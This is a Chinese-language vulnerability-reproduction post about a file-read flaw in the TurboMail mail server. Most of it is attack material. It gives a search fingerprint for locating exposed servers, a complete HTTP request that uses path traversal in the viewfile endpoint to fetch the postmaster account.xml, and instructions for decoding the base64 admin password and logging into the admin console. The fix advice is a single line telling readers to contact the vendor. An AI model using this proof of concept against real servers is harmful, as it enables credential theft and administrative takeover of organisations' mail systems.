【漏洞复现】TurboMail邮件系统viewfile文件读取漏洞

Nx01 产品简介

????????TurboMail邮件系统是广州拓波软件科技有限公司研发的面向企事业单位通信需求而研发的电子邮件服务器系统。

Nx02 漏洞描述

????????广州拓波软件科技有限公司TurboMail邮件系统存在viewfile文件读取漏洞，攻击者可通过此漏洞读取账户密码，从而登录后台进一步利用。

Nx03 产品主页

body="maintlogin.jsp" and body="/mailmain?type=logout"

Nx04 漏洞复现

POC1：

GET /viewfile?type=cardpic&mbid=1&msgid=2&logtype=3&view=true&cardid=/accounts/root/postmaster&cardclass=../&filename=/account.xml HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cache-Control: max-age=0

密码为base64加密,解密的时候=号后面的数据去掉，访问/maintlogin.jsp后台管理登录即可。

Nx05 修复建议

建议联系软件厂商进行处理。